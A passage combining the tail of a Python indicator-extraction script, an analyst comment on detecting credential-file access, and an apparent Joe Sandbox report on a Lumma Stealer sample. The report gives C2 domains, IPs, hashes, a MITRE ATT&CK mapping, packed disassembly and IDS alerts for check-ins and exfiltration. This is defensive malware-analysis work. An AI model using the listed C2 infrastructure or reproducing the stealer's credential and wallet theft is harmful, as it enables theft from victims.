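        m = LINE_RE.match(line)
        if not m:
            skipped += 1
            continue
        cls, val = classify(m.group("kind"), m.group("val"))
        found[cls].add(val)
    return {k: sorted(v) for k, v in found.items()}, skipped


def label_extension(ext_id):
    return KNOWN_EXTENSIONS.get(ext_id, "unknown")


if __name__ == "__main__":
    indicators, skipped = build_indicators(SAMPLE_LINES)
    for cls, values in indicators.items():
        print(f"[{cls}]")
        for v in values:
            print(f"  {v}" + (f"  ({label_extension(v)})" if cls == "browser_extension_id" else ""))
    print(f"skipped {skipped} unparsable line(s)")
```

The detection angle the output supports is process-to-path, not path alone: a browser legitimately opens `Login Data` and its own `Local Extension Settings\<id>` directories, so the hunt is for a non-browser image (here `JqGBbm7.exe`) reading them, and for any process that opens `\\.\SICE` or walks the window list looking for `ollydbg`. The generalised `C:\Users\*` paths drop straight into an EDR file-access query; the extension-ID set is what turns "the sample reads extension storage" into "the sample targets these wallets".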

                Remote Access Functionality

                Source: Yara match | File source: Process Memory Space: JqGBbm7.exe PID: 7280, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                MITRE ATT&CK matrix (rebuilt from the flattened table; each tactic lists its techniques in row order, and the number in parentheses is the matched-signature count the report attaches to that technique)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                Execution: Windows Management Instrumentation (12); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Defense Evasion: Virtualization/Sandbox Evasion (44); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: Security Software Discovery (861); Virtualization/Sandbox Evasion (44); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223); Wi-Fi Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                Command and Control: Encrypted Channel (21); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label | Link
JqGBbm7.exe | 69% | Virustotal | | Browse
JqGBbm7.exe | 74% | ReversingLabs | Win32.Exploit.Generic |
JqGBbm7.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
explorebieology.run | 104.21.31.208 | true | false | | high
ax-0001.ax-msedge.net | 150.171.28.10 | true | false | | high
tse1.mm.bing.net | unknown | unknown | false | | high
gadgethgfub.icu | unknown | unknown | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.cloudflare.com/learning/access-management/phishing-attack/ | JqGBbm7.exe, 00000000.00000003.1699572175.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1699679879.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | JqGBbm7.exe, 00000000.00000003.1712069801.0000000005712000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.microsof | JqGBbm7.exe, 00000000.00000003.1711853404.000000000573E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | JqGBbm7.exe, 00000000.00000003.1711899590.0000000005737000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711853404.000000000573E000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712069801.0000000005737000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | JqGBbm7.exe, 00000000.00000003.1712069801.0000000005712000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | JqGBbm7.exe, 00000000.00000003.1711899590.0000000005737000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711853404.000000000573E000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712069801.0000000005737000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.cloudflare.com/5xx-error-landing | JqGBbm7.exe, 00000000.00000003.1699572175.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1699679879.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.31.208 | explorebieology.run | United States | | 13335 | CLOUDFLARENETUS | false
                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1629893
                                                                    Start date and time:2025-03-05 09:13:15 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 4m 42s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:13
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:JqGBbm7.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@3/1
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:Failed
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Stop behavior analysis, all processes terminated
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 2.21.65.132, 2.21.65.154, 20.109.210.53, 40.126.31.1, 13.107.246.60, 20.223.35.26
                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, ctldl.windowsupdate.com, arc.msn.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:14:08 | API Interceptor | 8x Sleep call for process: JqGBbm7.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.31.208 | xIwQcY1fc4.exe | Get hash | malicious | Amadey, GCleaner, LummaC Stealer, PureLog Stealer | Browse |
 | S6uUdOHRxv.exe | Get hash | malicious | LummaC Stealer | Browse |
 | R3tmayKLpF.exe | Get hash | malicious | LummaC Stealer | Browse |
 | https://masdom.com | Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
explorebieology.run | GMOgZgNpNu.exe | Get hash | malicious | Amadey, LummaC Stealer | Browse | 172.67.179.246
 | xIwQcY1fc4.exe | Get hash | malicious | Amadey, GCleaner, LummaC Stealer, PureLog Stealer | Browse | 104.21.31.208
 | S6uUdOHRxv.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.31.208
 | R3tmayKLpF.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.31.208
ax-0001.ax-msedge.net | rap2o42GBd.vbs | Get hash | malicious | Unknown | Browse | 150.171.27.10
 | SecuriteInfo.com.Win32.MalwareX-gen.30508.25588.exe | Get hash | malicious | FormBook | Browse | 150.171.28.10
 | #U00e1raj#U00e1nlatk#U00e9r#U00e9s.mg.exe | Get hash | malicious | Unknown | Browse | 150.171.27.10
 | SfbAu0ICZn.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 150.171.27.10
 | http://imagekit.io/public/share/jedyb8c6o/3d23bf1bd85df6054e8a36ee022113464d68972afd38ce381e64fdf1933d3f92b711d4946c66a4059145e4bf1ff2ccffc63e817dd4e19d81d6140278ab6c7b542101c8bd792e064f02c249b7b97286a6 | Get hash | malicious | HTMLPhisher, Invisible JS | Browse | 150.171.28.10
 | https://app.hellobonsai.com/link/c8063f67300b3cd93813c8bb88f58154?utm_campaign=send_to_client&utm_content=primary-btn&utm_medium=email&utm_source=proposals | Get hash | malicious | Unknown | Browse | 150.171.28.10
 | 09.msi | Get hash | malicious | RedLine | Browse | 150.171.28.10
 | 674219467483TNVZGETYglqnPIZJADRO.dll | Get hash | malicious | Unknown | Browse | 150.171.28.10
 | GELEPLLV.msi | Get hash | malicious | RedLine, SectopRAT | Browse | 150.171.28.10
 | hhh.jpg.exe | Get hash | malicious | Unknown | Browse | 150.171.28.10
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | MCxU5Fj.exe | Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | 188.114.97.3
 | https://variotok.com | Get hash | malicious | HTMLPhisher | Browse | 104.18.95.41
 | virut' in file 'Setup.exe', during attempted open by 'explorer.exe' | Get hash | malicious | Unknown | Browse | 104.18.26.149
 | GMOgZgNpNu.exe | Get hash | malicious | Amadey, LummaC Stealer | Browse | 172.67.179.246
 | xIwQcY1fc4.exe | Get hash | malicious | Amadey, GCleaner, LummaC Stealer, PureLog Stealer | Browse | 104.21.31.208
 | Payment copy-8899.exe | Get hash | malicious | FormBook | Browse | 172.67.148.163
 | https://040030025.blob.core.windows.net/factura/index.html | Get hash | malicious | Phisher | Browse | 1.1.1.1
 | MARCH SHIPMENT PLAN DOCS.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.32.1
 | DHL AWB Receipt_pdf.bat.exe | Get hash | malicious | FormBook | Browse | 104.21.96.1
 | SWIFT COPY.xls | Get hash | malicious | Unknown | Browse | 104.26.1.139
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | MCxU5Fj.exe | Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | 104.21.31.208
 | GMOgZgNpNu.exe | Get hash | malicious | Amadey, LummaC Stealer | Browse | 104.21.31.208
 | xIwQcY1fc4.exe | Get hash | malicious | Amadey, GCleaner, LummaC Stealer, PureLog Stealer | Browse | 104.21.31.208
 | transferencia HSBC.xla.xlsx | Get hash | malicious | Unknown | Browse | 104.21.31.208
 | Order Confirmation.xls | Get hash | malicious | Unknown | Browse | 104.21.31.208
 | transferencia HSBC.xla.xlsx | Get hash | malicious | Unknown | Browse | 104.21.31.208
 | d5Wai5fIAK.exe | Get hash | malicious | Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | Browse | 104.21.31.208
 | VER_3316ARUGVHQMejzy7451UUFA.vbs | Get hash | malicious | Unknown | Browse | 104.21.31.208
 | S6uUdOHRxv.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.31.208
 | QyA6MaTya1.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.31.208
                                                                            No context
                                                                            No created / dropped files found
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):6.657586653605286
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:JqGBbm7.exe
                                                                            File size:2'996'224 bytes
                                                                            MD5:30c1a6337089e68b975438caebc8f497
                                                                            SHA1:2cf2324672cf72b9bc1869633f3bf6904bb61011
                                                                            SHA256:db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017
                                                                            SHA512:be8f68704c02b41bddbd94382d30197b13f68c783d041a077b35579c1a791a82bc68d99f828eb3b09c859237256791dd2d1c39eacf4e09ec2bd3f2aa6b54a484
                                                                            SSDEEP:49152:z8LHkXVgTDqB4QcGbVYljrnFL9gVysR2JwrZlhSMetwfX:I6VgTDM4tGbVujrnFL9WHDei
                                                                            TLSH:1CD54AA2A50A61CFD6CE17B89467CDC2682D42F5072469C3E86DF1BE7E63EC025B5C34
                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g..............................0...........@...........................1.....>C....@.................................W ..k..
                                                                            Icon Hash:90cececece8e8eb0
                                                                            Entrypoint:0x70e000
                                                                            Entrypoint Section:.taggant
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x67C0C953 [Thu Feb 27 20:21:39 2025 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                            Instruction
                                                                            jmp 00007FC064BF3C1Ah
                                                                            setbe byte ptr [00000000h]
                                                                            add cl, ch
                                                                            add byte ptr [eax], ah
                                                                            add byte ptr [eax], al
                                                                            inc ecx
                                                                            push bx
                                                                            dec esi
                                                                            dec ebp
                                                                            das
                                                                            xor al, 36h
                                                                            dec edi
                                                                            bound ecx, dword ptr [ecx+4Ah]
                                                                            dec edx
                                                                            insd
                                                                            push edi
                                                                            dec eax
                                                                            dec eax
                                                                            jbe 00007FC064BF3C82h
                                                                            push esi
                                                                            dec edx
                                                                            popad
                                                                            je 00007FC064BF3C7Bh
                                                                            push edx
                                                                            dec esi
                                                                            jc 00007FC064BF3C8Ah
                                                                            cmp byte ptr [ebx], dh
                                                                            push edx
                                                                            jns 00007FC064BF3C57h
                                                                            or eax, 49674B0Ah
                                                                            cmp byte ptr [edi+43h], dl
                                                                            jnc 00007FC064BF3C5Dh
                                                                            bound eax, dword ptr [ecx+30h]
                                                                            pop edx
                                                                            inc edi
                                                                            push esp
                                                                            push 43473163h
                                                                            aaa
                                                                            push edi
                                                                            dec esi
                                                                            xor ebp, dword ptr [ebx+59h]
                                                                            push edi
                                                                            push edx
                                                                            pop eax
                                                                            je 00007FC064BF3C67h
                                                                            xor dl, byte ptr [ebx+2Bh]
                                                                            popad
                                                                            jne 00007FC064BF3C5Ch
                                                                            dec eax
                                                                            dec ebp
                                                                            jo 00007FC064BF3C53h
                                                                            xor dword ptr [edi], esi
                                                                            inc esp
                                                                            dec edx
                                                                            dec ebp
                                                                            jns 00007FC064BF3C60h
                                                                            insd
                                                                            jnc 00007FC064BF3C80h
                                                                            aaa
                                                                            inc esp
                                                                            inc ecx
                                                                            inc ebx
                                                                            xor dl, byte ptr [ecx+4Bh]
                                                                            inc edx
                                                                            inc esp
                                                                            bound esi, dword ptr [ebx]
                                                                            or eax, 63656B0Ah
                                                                            jno 00007FC064BF3C68h
                                                                            push edx
                                                                            insb
                                                                            js 00007FC064BF3C81h
                                                                            outsb
                                                                            inc ecx
                                                                            jno 00007FC064BF3C62h
                                                                            push ebp
                                                                            inc esi
                                                                            pop edx
                                                                            xor eax, dword ptr [ebx+36h]
                                                                            push eax
                                                                            aaa
                                                                            imul edx, dword ptr [ebx+58h], 4Eh
                                                                            aaa
                                                                            inc ebx
                                                                            jbe 00007FC064BF3C5Ch
                                                                            dec ebx
                                                                            js 00007FC064BF3C53h
                                                                            jne 00007FC064BF3C41h
                                                                            push esp
                                                                            inc bp
                                                                            outsb
                                                                            inc edx
                                                                            popad
                                                                            dec ebx
                                                                            insd
                                                                            dec ebp
                                                                            inc edi
                                                                            xor dword ptr [ecx+36h], esp
                                                                            push 0000004Bh
                                                                            sub eax, dword ptr [ebp+33h]
                                                                            jp 00007FC064BF3C6Ch
                                                                            dec edx
                                                                            xor bh, byte ptr [edx+56h]
                                                                            bound eax, dword ptr [edi+66h]
                                                                            jbe 00007FC064BF3C4Ah
                                                                            dec eax
                                                                            or eax, 506C720Ah
                                                                            aaa
                                                                            xor dword ptr fs:[ebp+62h], ecx
                                                                            arpl word ptr [esi], si
                                                                            inc esp
                                                                            jo 00007FC064BF3C83h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x62057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x61000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x621f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x60000 | 0x2e400 | d2c5c8d2124adca3731f28b863ab4c9d | False | 0.9981260557432432 | data | 7.987624463356723 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x61000 | 0x1ac | 0x200 | a6c0b70bf165f6b9e4d36c747e8a40f1 | False | 0.54296875 | data | 5.257512990547039 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x62000 | 0x1000 | 0x200 | abe4e884b58240d1cb9001d893d0bcb2 | False | 0.150390625 | data | 1.0437720338377494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cmtgbjjz | 0x63000 | 0x2aa000 | 0x2a9a00 | fe090cfc105eb89e3ef011369693cf9b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
amlicovq | 0x30d000 | 0x1000 | 0x400 | 231b426cc2373f9cf0387faa5be6f9bd | False | 0.8095703125 | data | 6.270196537648137 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x30e000 | 0x3000 | 0x2200 | 5da3a28f5d73ad82d08ea9d462635b40 | False | 0.3977481617647059 | DOS executable (COM) | 4.161252641920357 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x61058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-05T09:14:08.552721+0100 | 2060538 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gadgethgfub .icu) | 1 | 192.168.2.4 | 58036 | 1.1.1.1 | 53 | UDP
2025-03-05T09:14:08.569261+0100 | 2060536 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explorebieology .run) | 1 | 192.168.2.4 | 56573 | 1.1.1.1 | 53 | UDP
2025-03-05T09:14:09.073658+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:09.073658+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:09.533603+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:09.533603+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:10.196038+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:10.196038+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:10.677834+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:11.400800+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49735 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:11.400800+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:13.016025+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49736 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:13.016025+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:14.404589+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49737 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:14.404589+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:16.201598+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49738 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:16.201598+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:16.711841+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49738 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:17.725240+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49739 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:17.725240+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:17.732437+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.4 | 49739 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:19.835558+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49740 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:19.835558+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 104.21.31.208 | 443 | TCP
